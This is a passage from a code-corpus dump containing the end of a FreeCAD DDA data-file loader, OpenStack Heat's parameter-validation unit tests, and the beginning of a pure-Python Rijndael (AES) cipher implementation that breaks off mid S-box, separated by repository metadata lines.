[DDAPoint(t[0],t[1]) for t in self.__measuredPoints] database.holePoints = [DDAPoint(t[0],t[1]) for t in self.__holePoints] self.reset() import Base Base.refreshAllShapes() class ParseDFInputParameters(BaseParseData): def __init__(self): self.__file = None self.reset() def reset(self): from DDADatabase import df_inputDatabase self.paras = df_inputDatabase.paras self.paras.reset() def __parseParaSchema(self): ''' parse parameters from DF parameters file :param infile: ''' for i in range(7): line = self.__file.getNextLine() t =self.parseFloatNum(line) if t==None: return False if i==0: self.paras.ifDynamic = float(t) elif i==1: self.paras.stepsNum = int(t) elif i==2: self.paras.blockMatsNum = int(t) elif i==3: self.paras.jointMatsNum = int(t) elif i==4: self.paras.ratio = t elif i==5: self.paras.OneSteptimeLimit = int(t) else: self.paras.springStiffness = int(t) print 'DF Para : IfDynamic: %d steps: %d blockMats: %d JointMats: %d Ratio: %f timeInterval: %d stiffness: %d'\ %(self.paras.ifDynamic, self.paras.stepsNum , self.paras.blockMatsNum , self.paras.jointMatsNum \ , self.paras.ratio, self.paras.OneSteptimeLimit, self.paras.springStiffness) print 'Df parameters schema done' return True def __parsePointsParameters(self): ''' parse parameters for fixed points and loading points :param infile: ''' # parse fixed points and loading points' type 0 : fixed points , 2: loading points # fixed points from DDADatabase import df_inputDatabase if len(df_inputDatabase.fixedPoints)>0: line = self.__file.getNextLine() nums = line.split() for i in nums: if self.parseIntNum(i)==None : return False print nums # loading points if len(df_inputDatabase.loadingPoints)>0: line = self.__file.getNextLine() nums = line.split() for i in nums: if self.parseIntNum(i)==None : return False print nums # parse loading points parameters (starttime , stressX , stressY , endtime , stressX , stressY) for i in range(len(df_inputDatabase.loadingPoints)): digits = [1]*6 line1 = self.__file.getNextLine() nums1 = line1.split() line2 = self.__file.getNextLine() nums2 = line2.split() for j in range(3): digits[j] = self.parseIntNum(nums1[j]) digits[j+3] = self.parseIntNum(nums2[j]) if None in digits: return False self.paras.loadingPointMats.append(digits) print nums1 , nums2 print 'fixed points and loading points done.' return True def __parseBlocksAndJointsPara(self): ''' parse parameters for blocks and joints' :param infile: ''' for i in range(self.paras.blockMatsNum): digits = [1]*14 line1 = self.__file.getNextLine() nums1 = line1.split() for j in range(5): digits[j] = self.parseFloatNum(nums1[j]) line2 = self.__file.getNextLine() nums2 = line2.split() line3 = self.__file.getNextLine() nums3 = line3.split() line4 = self.__file.getNextLine() nums4 = line4.split() for j in range(3): digits[j+5] = self.parseFloatNum(nums2[j]) digits[j+8] = self.parseFloatNum(nums3[j]) digits[j+11] = self.parseFloatNum(nums4[j]) if None in digits: return False self.paras.blockMats.append(digits) print digits for i in range(self.paras.jointMatsNum): digits = [1]*3 line = self.__file.getNextLine() nums = line.split() for j in range(3): digits[j] = self.parseFloatNum(nums[j]) if None in digits: return False self.paras.jointMats.append(digits) print digits print 'DF blocks and block vertices\' parameters done.' return True def __parseRestPara(self ): ''' parse SOR and axes :param infile: ''' # parse SOR line = self.__file.getNextLine() self.paras.SOR = self.parseFloatNum(line) if self.paras.SOR==None: return False print 'SOR : ' , self.paras.SOR line = self.__file.getNextLine() nums = line.split() for i in range(3): if self.parseFloatNum(nums[i])==None: return False print nums print 'DF parameters all done.' return True def parse(self , path = None): self.reset() if not path: Base.__currentProjectPath__+'/parameters.df' if not checkFileExists(path): return False import Base self.__file = FileReader() self.__file.setFile(path) if not self.__parseParaSchema() or not self.__parsePointsParameters() \ or not self.__parseBlocksAndJointsPara() or not self.__parseRestPara(): return False return True class ParseDFInputGraphData(BaseParseData): def __init__(self): self.__fileReader = None def GetResources(self): return { 'Pixmap' : 'LoadDFInput', 'MenuText': 'LoadDFInputData', 'ToolTip': "Load DF Input Data"} def Activated(self): self.parse() import Base Base.changeStep4Stage('ShapesAvailable') def finish(self): pass def parse(self , path=None): self.refreshBlocksData() import Base if not path : path = Base.__currentProjectPath__+'/data.df' if not checkFileExists(path): return False file = open(path , "rb") if not self.__parseDataSchema(file) or not self.__parseBlocks(file) or \ not self.__parseBlockVertices(file) or not self.__parseBoltElements(file) \ or not self.__parsePoints(file): Base.showErrorMessageBox("DataError", 'Data input unvalid') return False return True def refreshBlocksData(self): import Base self.graph = Base.getDatabaser4CurrentStage() self.graph.reset() self.blocksNum = 0 self.blockVerticesNum = 0 self.fixedPointsNum = 0 self.loadingPointsNum = 0 self.measuredPointsNum = 0 self.boltElementsNum = 0 def __parseDataSchema(self , infile): line = infile.readline() nums = line.split() self.blocksNum = self.parseIntNum(nums[0]) self.boltElementsNum = self.parseIntNum(nums[1]) self.blockVerticesNum = self.parseIntNum(nums[2]) line = infile.readline() nums = line.split() self.fixedPointsNum = self.parseIntNum(nums[0]) self.loadingPointsNum = self.parseIntNum(nums[1]) self.measuredPointsNum = self.parseIntNum(nums[2]) if None in [self.blocksNum , self.boltElementsNum , self.blockVerticesNum \ , self.fixedPointsNum , self.loadingPointsNum , self.measuredPointsNum]: return False print 'DF data : blocks : %d bolts : %d vertices : %d fixed Pnts :%d LoadingPnts :%d MeasuredPnts: %d' \ %(self.blocksNum , self.boltElementsNum , self.blockVerticesNum \ , self.fixedPointsNum , self.loadingPointsNum , self.measuredPointsNum) return True def __parseBlocks(self , infile): ''' parsing blocks and try to get the maximum material No :param infile: ''' from DDADatabase import df_inputDatabase df_inputDatabase.blockMatCollections = set() blockMatCollection = df_inputDatabase.blockMatCollections for i in range(0 , self.blocksNum): line = infile.readline() nums = line.split() # get blocks' vertices' material No t0 = self.parseIntNum(nums[0]) t1 = self.parseIntNum(nums[1]) t2 = self.parseIntNum(nums[2]) if t0==None or t1==None or t2==None: return False tmpB = Block() tmpB.materialNo = t0 tmpB.startNo = t1 tmpB.endNo = t2 blockMatCollection.add(t0) self.graph.blocks.append(tmpB ) # print line , print 'DF blocks Info done.' return True def __parseBlockVertices(self,infile): ''' parsing blocks' vertices and try to get the maximum material No :param infile: ''' from DDADatabase import df_inputDatabase df_inputDatabase.jointMatCollections =set() jointMatCollection = df_inputDatabase.jointMatCollections ptsBounds = range(4) for i in range(self.blocksNum): tmpB = self.graph.blocks[i] for j in range(int(tmpB.endNo) - int(tmpB.startNo) +1): # read blocks vertices line = infile.readline() # print line nums = line.split() # get joint material No t0 = int(self.parseFloatNum(nums[0])) t1 = self.parseFloatNum(nums[1]) t2 = self.parseFloatNum(nums[2]) if t0==None or t1==None or t2==None: return False tmpB.vertices.append( (t0,t1,t2) ) jointMatCollection.add(t0) # get vertices' value boundary if i==0: ptsBounds[0]=ptsBounds[1] = t1 ptsBounds[2]=ptsBounds[2] = t2 else: if t1<ptsBounds[0]: ptsBounds[0]=t1 elif t1>ptsBounds[1]: ptsBounds[1]=t1 elif t2<ptsBounds[2]: ptsBounds[2]=t2 elif t2>ptsBounds[3]: ptsBounds[3]=t2 for i in range(4): # block parameters line = infile.readline() # print line nums = line.split() t0 = self.parseFloatNum(nums[0]) t1 = self.parseFloatNum(nums[1]) t2 = self.parseFloatNum(nums[2]) if t0==None or t1==None or t2==None: return False tmpB.parameters.extend([t0,t1,t2]) import Base margin = ptsBounds[1]-ptsBounds[0] if margin > (ptsBounds[3]-ptsBounds[2]): margin = ptsBounds[3]-ptsBounds[2] Base.__radius4Points__ = margin/60 print 'DF blocks vertices data done.' return True def __parseBoltElements(self , infile): for i in range(self.boltElementsNum): for j in range(3): line = infile.readline() print ' %d bolt elements parsed done'%self.boltElementsNum return True def parse1Point(self , line , point): #print line , nums = line.split() point.x = self.parseFloatNum(nums[0]) point.y = self.parseFloatNum(nums[1]) point.blockNo = int(self.parseFloatNum(nums[2])) def __parsePoints(self , infile): ''' parsing fixed , loading , and measured points :param infile: ''' for i in range(self.fixedPointsNum): pnt = FixedPoint() line = infile.readline() self.parse1Point(line , pnt) self.graph.fixedPoints.append(pnt) print ' fixed points : %d done'%self.fixedPointsNum for i in range(self.loadingPointsNum): pnt = LoadingPoint() line = infile.readline() self.parse1Point(line , pnt) self.graph.loadingPoints.append(pnt) print ' loading points : %d done'%self.loadingPointsNum for i in range(self.measuredPointsNum): pnt = MeasuredPoint() line = infile.readline() self.parse1Point(line , pnt) self.graph.measuredPoints.append(pnt) print ' measured points : %d done'%self.measuredPointsNum print 'DF points done.' return True class ParseAndLoadDCInputData(BaseParseData): def __init__(self): self.reset() self.__fileReader = FileReader() self.database = None def GetResources(self): return { 'Pixmap' : 'LoadDCInput', 'MenuText': 'LoadDCInputData', 'ToolTip': "Load DC Input Data"} def Activated(self): self.parse() import Base Base.changeStep4Stage('SpecialStep') import Base database = Base.getDatabaser4CurrentStage() database.clearRedoUndoList() def finish(self): pass def reset(self): self.jointLinesNum = 0 self.materialLinesNum = 0 self.additionalLinesNum = 0 self.boltElementsNum = 0 self.fixedPointsNum = 0 self.loadingPointsNum = 0 self.measuredPointsNum = 0 self.holePointsNum = 0 def __ParsePandect(self): # from DDADatabase import dc_inputDatabase self.__fileReader.getNextLine() # minimum edge length e0 nums = self.__fileReader.getNextLine().split() self.jointLinesNum = self.parseIntNum(nums[0]) # temperary code, I will try to revise this if I fully understand the data.dc self.database.boundaryLinesNum = self.parseIntNum(nums[1]) nums = self.__fileReader.getNextLine() self.materialLinesNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.boltElementsNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.fixedPointsNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.loadingPointsNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.measuredPointsNum = self.parseIntNum(nums) nums = self.__fileReader.getNextLine() self.holePointsNum = self.parseIntNum(nums) def __parseLines(self): # from DDADatabase import dc_inputDatabase # joint lines self.database.jointLines = [] for i in range(self.jointLinesNum): nums = self.__fileReader.getNextLine().split() jointMaterial = int(self.parseFloatNum(nums[4])) p1 = ( self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0 ) p2 = ( self.parseFloatNum(nums[2]) , self.parseFloatNum(nums[3]) , 0 ) self.database.jointLines.append(DDALine(p1 , p2 , jointMaterial)) # material lines self.database.materialLines = [] for i in range(self.materialLinesNum): self.__fileReader.getNextLine() # bolt elements tmpNums = range(4) self.database.boltElements = [] for i in range(self.boltElementsNum): nums = self.__fileReader.getNextLine().split() for j in range(4): tmpNums[j] = self.parseFloatNum(nums[j], 'bolt element coordinate number') if tmpNums[j] == None : return False e0 = self.parseFloatNum(nums[4], 'bolt element e0') t0 = self.parseFloatNum(nums[5], 'bolt element t0') f0 = self.parseFloatNum(nums[6], 'bolt element f0') if e0==None or t0==None or f0==None : return False print 'block material %d :(%f , %f , %f , %f , %f , %f , %f)'%(i , tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0) self.database.boltElements.append(BoltElement(tmpNums[0] , tmpNums[1] ,tmpNums[2] , tmpNums[3] , e0 , t0 , f0)) def __parsePoints(self): # from DDADatabase import dc_inputDatabase import Base # fixed points windowInfo = [0 , 0 , 0 , 0] nums = self.__fileReader.getNextLine().split() p = (self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0) self.database.fixedPoints.append( FixedPoint(p[0] , p[1])) windowInfo[0] = windowInfo[1] = p[0] windowInfo[2] = windowInfo[3] = p[1] for i in range(self.fixedPointsNum-1): nums = self.__fileReader.getNextLine().split() p = (self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]) , 0) if p[0]<windowInfo[0]:windowInfo[0] = p[0] if p[0]>windowInfo[1]:windowInfo[1] = p[0] if p[1]<windowInfo[2]:windowInfo[2] = p[1] if p[1]>windowInfo[3]:windowInfo[3] = p[1] self.database.fixedPoints.append( FixedPoint(p[0] , p[1])) Base.__radius4Points__ = (windowInfo[1] - windowInfo[0]) * 0.01 Base.__windowInfo__ = windowInfo # loading points for i in range(self.loadingPointsNum): nums = self.__fileReader.getNextLine().split() self.database.loadingPoints.append( \ LoadingPoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]))) # measured points for i in range(self.measuredPointsNum): nums = self.__fileReader.getNextLine().split() self.database.measuredPoints.append( \ MeasuredPoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]))) # hole points for i in range(self.holePointsNum): nums = self.__fileReader.getNextLine().split() self.database.holePoints.append( \ HolePoint(self.parseFloatNum(nums[0]) , self.parseFloatNum(nums[1]))) def parse(self): import Base filename = Base.__currentProjectPath__ + '/data.dc' print 'try to read DC data from file : ' , filename # filename = Base.__currentProjectPath__ + '/tmpData.dc' self.__fileReader.setFile(filename) import DDADatabase self.database = DDADatabase.DCInputDatabase() self.reset() self.__ParsePandect() self.__parseLines() self.__parsePoints() self.__fileReader.closeFile() DDADatabase.dc_inputDatabase = self.database self.database = None class DDALoadData(): def __init__(self): self.current_path = Base.__currentProjectPath__ def changeStage( self ): if Base.__currentStage__ == 'DL': # DL stage print 'switch to DL stage' self.parseData = ParseAndLoadDLData() elif Base.__currentStage__ == 'DC': # DC stage pass def GetResources(self): return { 'MenuText': 'Load', 'ToolTip': "Load DL data."} def __storeFileName(self , filename): ''' store the name of file which is being loaded ''' file = open(self.current_path+'\\Ff.c' , 'wb') file.write(filename.strip().split('/')[-1]) file.close() def __confirmLoadFile(self): ''' if a new data file loaded , old shapes will be cleared , so before this ,we have to make sure if user want to do this. ''' box = QtGui.QMessageBox() box.setText('New data will be imported , and old shapes will be wipped.') box.setInformativeText('Do you want to do this?') box.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel) box.setDefaultButton(QtGui.QMessageBox.Ok) ret = box.exec_() if ret == QtGui.QMessageBox.Ok: return True return False def Activated(self): self.changeStage() filename = str( QtGui.QFileDialog.getOpenFileName(None , 'please select input file' , self.current_path) ) if not self.parseData.parse(filename): self.parseData.reset() print 'input data status : invalid' return False print 'input data status : ok' if self.__confirmLoadFile(): self.__storeFileName(filename) self.parseData.save2Database() FreeCADGui.DDADisplayCmd.preview() def finish(self): pass FreeCADGui.addCommand('DDA_LoadDLInputData', ParseAndLoadDLData()) FreeCADGui.addCommand('DDA_Load', DDALoadData()) FreeCADGui.addCommand('DDA_LoadDCInputData', ParseAndLoadDCInputData()) FreeCADGui.addCommand('DDA_LoadDFInputGraphData', ParseDFInputGraphData())
lgpl-2.1
-3,771,634,351,096,124,000
36.414041
156
0.529423
false
Triv90/Heat
heat/tests/test_parameters.py
1
12606
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import unittest from nose.plugins.attrib import attr import json from heat.engine import parameters @attr(tag=['unit', 'parameters']) @attr(speed='fast') class ParameterTest(unittest.TestCase): def test_new_string(self): p = parameters.Parameter('p', {'Type': 'String'}) self.assertTrue(isinstance(p, parameters.StringParam)) def test_new_number(self): p = parameters.Parameter('p', {'Type': 'Number'}) self.assertTrue(isinstance(p, parameters.NumberParam)) def test_new_list(self): p = parameters.Parameter('p', {'Type': 'CommaDelimitedList'}) self.assertTrue(isinstance(p, parameters.CommaDelimitedListParam)) def test_new_bad_type(self): self.assertRaises(ValueError, parameters.Parameter, 'p', {'Type': 'List'}) def test_new_no_type(self): self.assertRaises(KeyError, parameters.Parameter, 'p', {'Default': 'blarg'}) def test_default_no_override(self): p = parameters.Parameter('defaulted', {'Type': 'String', 'Default': 'blarg'}) self.assertTrue(p.has_default()) self.assertEqual(p.default(), 'blarg') self.assertEqual(p.value(), 'blarg') def test_default_override(self): p = parameters.Parameter('defaulted', {'Type': 'String', 'Default': 'blarg'}, 'wibble') self.assertTrue(p.has_default()) self.assertEqual(p.default(), 'blarg') self.assertEqual(p.value(), 'wibble') def test_default_invalid(self): schema = {'Type': 'String', 'AllowedValues': ['foo'], 'ConstraintDescription': 'wibble', 'Default': 'bar'} try: parameters.Parameter('p', schema, 'foo') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_no_echo_true(self): p = parameters.Parameter('anechoic', {'Type': 'String', 'NoEcho': 'true'}, 'wibble') self.assertTrue(p.no_echo()) self.assertNotEqual(str(p), 'wibble') def test_no_echo_true_caps(self): p = parameters.Parameter('anechoic', {'Type': 'String', 'NoEcho': 'TrUe'}, 'wibble') self.assertTrue(p.no_echo()) self.assertNotEqual(str(p), 'wibble') def test_no_echo_false(self): p = parameters.Parameter('echoic', {'Type': 'String', 'NoEcho': 'false'}, 'wibble') self.assertFalse(p.no_echo()) self.assertEqual(str(p), 'wibble') def test_description(self): description = 'Description of the parameter' p = parameters.Parameter('p', {'Type': 'String', 'Description': description}) self.assertEqual(p.description(), description) def test_no_description(self): p = parameters.Parameter('p', {'Type': 'String'}) self.assertEqual(p.description(), '') def test_string_len_good(self): schema = {'Type': 'String', 'MinLength': '3', 'MaxLength': '3'} p = parameters.Parameter('p', schema, 'foo') self.assertEqual(p.value(), 'foo') def test_string_underflow(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'MinLength': '4'} try: parameters.Parameter('p', schema, 'foo') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_string_overflow(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'MaxLength': '2'} try: parameters.Parameter('p', schema, 'foo') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_string_pattern_good(self): schema = {'Type': 'String', 'AllowedPattern': '[a-z]*'} p = parameters.Parameter('p', schema, 'foo') self.assertEqual(p.value(), 'foo') def test_string_pattern_bad_prefix(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'AllowedPattern': '[a-z]*'} try: parameters.Parameter('p', schema, '1foo') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_string_pattern_bad_suffix(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'AllowedPattern': '[a-z]*'} try: parameters.Parameter('p', schema, 'foo1') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_string_value_list_good(self): schema = {'Type': 'String', 'AllowedValues': ['foo', 'bar', 'baz']} p = parameters.Parameter('p', schema, 'bar') self.assertEqual(p.value(), 'bar') def test_string_value_list_bad(self): schema = {'Type': 'String', 'ConstraintDescription': 'wibble', 'AllowedValues': ['foo', 'bar', 'baz']} try: parameters.Parameter('p', schema, 'blarg') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_number_int_good(self): schema = {'Type': 'Number', 'MinValue': '3', 'MaxValue': '3'} p = parameters.Parameter('p', schema, '3') self.assertEqual(p.value(), '3') def test_number_float_good(self): schema = {'Type': 'Number', 'MinValue': '3.0', 'MaxValue': '3.0'} p = parameters.Parameter('p', schema, '3.0') self.assertEqual(p.value(), '3.0') def test_number_low(self): schema = {'Type': 'Number', 'ConstraintDescription': 'wibble', 'MinValue': '4'} try: parameters.Parameter('p', schema, '3') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_number_high(self): schema = {'Type': 'Number', 'ConstraintDescription': 'wibble', 'MaxValue': '2'} try: parameters.Parameter('p', schema, '3') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_number_value_list_good(self): schema = {'Type': 'Number', 'AllowedValues': ['1', '3', '5']} p = parameters.Parameter('p', schema, '5') self.assertEqual(p.value(), '5') def test_number_value_list_bad(self): schema = {'Type': 'Number', 'ConstraintDescription': 'wibble', 'AllowedValues': ['1', '3', '5']} try: parameters.Parameter('p', schema, '2') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') def test_list_value_list_good(self): schema = {'Type': 'CommaDelimitedList', 'AllowedValues': ['foo', 'bar', 'baz']} p = parameters.Parameter('p', schema, 'baz,foo,bar') self.assertEqual(p.value(), 'baz,foo,bar') def test_list_value_list_bad(self): schema = {'Type': 'CommaDelimitedList', 'ConstraintDescription': 'wibble', 'AllowedValues': ['foo', 'bar', 'baz']} try: parameters.Parameter('p', schema, 'foo,baz,blarg') except ValueError as ve: msg = str(ve) self.assertNotEqual(msg.find('wibble'), -1) else: self.fail('ValueError not raised') params_schema = json.loads('''{ "Parameters" : { "User" : { "Type": "String" }, "Defaulted" : { "Type": "String", "Default": "foobar" } } }''') @attr(tag=['unit', 'parameters']) @attr(speed='fast') class ParametersTest(unittest.TestCase): def test_pseudo_params(self): params = parameters.Parameters('test_stack', {"Parameters": {}}) self.assertEqual(params['AWS::StackName'], 'test_stack') self.assertEqual(params['AWS::StackId'], 'None') self.assertTrue('AWS::Region' in params) def test_pseudo_param_stackid(self): params = parameters.Parameters('test_stack', {'Parameters': {}}, stack_id='123::foo') self.assertEqual(params['AWS::StackId'], '123::foo') params.set_stack_id('456::bar') self.assertEqual(params['AWS::StackId'], '456::bar') def test_user_param(self): user_params = {'User': 'wibble'} params = parameters.Parameters('test', params_schema, user_params) self.assertEqual(params.user_parameters(), user_params) def test_user_param_nonexist(self): params = parameters.Parameters('test', params_schema) self.assertEqual(params.user_parameters(), {}) def test_schema_invariance(self): params1 = parameters.Parameters('test', params_schema, {'Defaulted': 'wibble'}) self.assertEqual(params1['Defaulted'], 'wibble') params2 = parameters.Parameters('test', params_schema) self.assertEqual(params2['Defaulted'], 'foobar') def test_to_dict(self): template = {'Parameters': {'Foo': {'Type': 'String'}, 'Bar': {'Type': 'Number', 'Default': '42'}}} params = parameters.Parameters('test_params', template, {'Foo': 'foo'}) as_dict = dict(params) self.assertEqual(as_dict['Foo'], 'foo') self.assertEqual(as_dict['Bar'], '42') self.assertEqual(as_dict['AWS::StackName'], 'test_params') self.assertTrue('AWS::Region' in as_dict) def test_map(self): template = {'Parameters': {'Foo': {'Type': 'String'}, 'Bar': {'Type': 'Number', 'Default': '42'}}} params = parameters.Parameters('test_params', template, {'Foo': 'foo'}) expected = {'Foo': False, 'Bar': True, 'AWS::Region': True, 'AWS::StackId': True, 'AWS::StackName': True} self.assertEqual(params.map(lambda p: p.has_default()), expected) def test_map_str(self): template = {'Parameters': {'Foo': {'Type': 'String'}, 'Bar': {'Type': 'Number'}}} params = parameters.Parameters('test_params', template, { 'Foo': 'foo', 'Bar': 42}) expected = {'Foo': 'foo', 'Bar': '42', 'AWS::Region': 'ap-southeast-1', 'AWS::StackId': 'None', 'AWS::StackName': 'test_params'} self.assertEqual(params.map(str), expected)
apache-2.0
333,710,865,556,699,400
35.53913
79
0.523164
false
TheDSCPL/SSRE_2017-2018_group8
Projeto/Python/cryptopy/crypto/cipher/rijndael.py
1
14718
# -*- coding: utf-8 -*- """ crypto.cipher.rijndael Rijndael encryption algorithm This byte oriented implementation is intended to closely match FIPS specification for readability. It is not implemented for performance. Copyright © (c) 2002 by Paul A. Lambert Read LICENSE.txt for license information. 2002-06-01 """ from crypto.cipher.base import BlockCipher, padWithPadLen, noPadding class Rijndael(BlockCipher): """ Rijndael encryption algorithm """ def __init__(self, key = None, padding = padWithPadLen(), keySize=16, blockSize=16 ): self.name = 'RIJNDAEL' self.keySize = keySize self.strength = keySize*8 self.blockSize = blockSize # blockSize is in bytes self.padding = padding # change default to noPadding() to get normal ECB behavior assert( keySize%4==0 and NrTable[4].has_key(keySize/4)),'key size must be 16,20,24,29 or 32 bytes' assert( blockSize%4==0 and NrTable.has_key(blockSize/4)), 'block size must be 16,20,24,29 or 32 bytes' self.Nb = self.blockSize/4 # Nb is number of columns of 32 bit words self.Nk = keySize/4 # Nk is the key length in 32-bit words self.Nr = NrTable[self.Nb][self.Nk] # The number of rounds (Nr) is a function of # the block (Nb) and key (Nk) sizes. if key != None: self.setKey(key) def setKey(self, key): """ Set a key and generate the expanded key """ assert( len(key) == (self.Nk*4) ), 'Key length must be same as keySize parameter' self.__expandedKey = keyExpansion(self, key) self.reset() # BlockCipher.reset() def encryptBlock(self, plainTextBlock): """ Encrypt a block, plainTextBlock must be a array of bytes [Nb by 4] """ self.state = self._toBlock(plainTextBlock) AddRoundKey(self, self.__expandedKey[0:self.Nb]) for round in range(1,self.Nr): #for round = 1 step 1 to Nr–1 SubBytes(self) ShiftRows(self) MixColumns(self) AddRoundKey(self, self.__expandedKey[round*self.Nb:(round+1)*self.Nb]) SubBytes(self) ShiftRows(self) AddRoundKey(self, self.__expandedKey[self.Nr*self.Nb:(self.Nr+1)*self.Nb]) return self._toBString(self.state) def decryptBlock(self, encryptedBlock): """ decrypt a block (array of bytes) """ self.state = self._toBlock(encryptedBlock) AddRoundKey(self, self.__expandedKey[self.Nr*self.Nb:(self.Nr+1)*self.Nb]) for round in range(self.Nr-1,0,-1): InvShiftRows(self) InvSubBytes(self) AddRoundKey(self, self.__expandedKey[round*self.Nb:(round+1)*self.Nb]) InvMixColumns(self) InvShiftRows(self) InvSubBytes(self) AddRoundKey(self, self.__expandedKey[0:self.Nb]) return self._toBString(self.state) def _toBlock(self, bs): """ Convert binary string to array of bytes, state[col][row]""" assert ( len(bs) == 4*self.Nb ), 'Rijndarl blocks must be of size blockSize' return [[ord(bs[4*i]),ord(bs[4*i+1]),ord(bs[4*i+2]),ord(bs[4*i+3])] for i in range(self.Nb)] def _toBString(self, block): """ Convert block (array of bytes) to binary string """ l = [] for col in block: for rowElement in col: l.append(chr(rowElement)) return ''.join(l) #------------------------------------- """ Number of rounds Nr = NrTable[Nb][Nk] Nb Nk=4 Nk=5 Nk=6 Nk=7 Nk=8 ------------------------------------- """ NrTable = {4: {4:10, 5:11, 6:12, 7:13, 8:14}, 5: {4:11, 5:11, 6:12, 7:13, 8:14}, 6: {4:12, 5:12, 6:12, 7:13, 8:14}, 7: {4:13, 5:13, 6:13, 7:13, 8:14}, 8: {4:14, 5:14, 6:14, 7:14, 8:14}} #------------------------------------- def keyExpansion(algInstance, keyString): """ Expand a string of size keySize into a larger array """ Nk, Nb, Nr = algInstance.Nk, algInstance.Nb, algInstance.Nr # for readability key = [ord(byte) for byte in keyString] # convert string to list w = [[key[4*i],key[4*i+1],key[4*i+2],key[4*i+3]] for i in range(Nk)] for i in range(Nk,Nb*(Nr+1)): temp = w[i-1] # a four byte column if (i%Nk) == 0 : temp = temp[1:]+[temp[0]] # RotWord(temp) temp = [ Sbox[byte] for byte in temp ] temp[0] ^= Rcon[i/Nk] elif Nk > 6 and i%Nk == 4 : temp = [ Sbox[byte] for byte in temp ] # SubWord(temp) w.append( [ w[i-Nk][byte]^temp[byte] for byte in range(4) ] ) return w Rcon = (0,0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36, # note extra '0' !!! 0x6c,0xd8,0xab,0x4d,0x9a,0x2f,0x5e,0xbc,0x63,0xc6, 0x97,0x35,0x6a,0xd4,0xb3,0x7d,0xfa,0xef,0xc5,0x91) #------------------------------------- def AddRoundKey(algInstance, keyBlock): """ XOR the algorithm state with a block of key material """ for column in range(algInstance.Nb): for row in range(4): algInstance.state[column][row] ^= keyBlock[column][row] #------------------------------------- def SubBytes(algInstance): for column in range(algInstance.Nb): for row in range(4): algInstance.state[column][row] = Sbox[algInstance.state[column][row]] def InvSubBytes(algInstance): for column in range(algInstance.Nb): for row in range(4): algInstance.state[column][row] = InvSbox[algInstance.state[column][row]] Sbox = (0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5, 0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76, 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0, 0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0, 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc, 0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15, 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a, 0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75, 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0, 0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84, 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b, 0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf, 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85, 0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8, 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5, 0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2, 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17, 0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73, 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88, 0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb, 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c, 0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79, 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9, 0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08, 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6, 0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a, 0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e, 0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e, 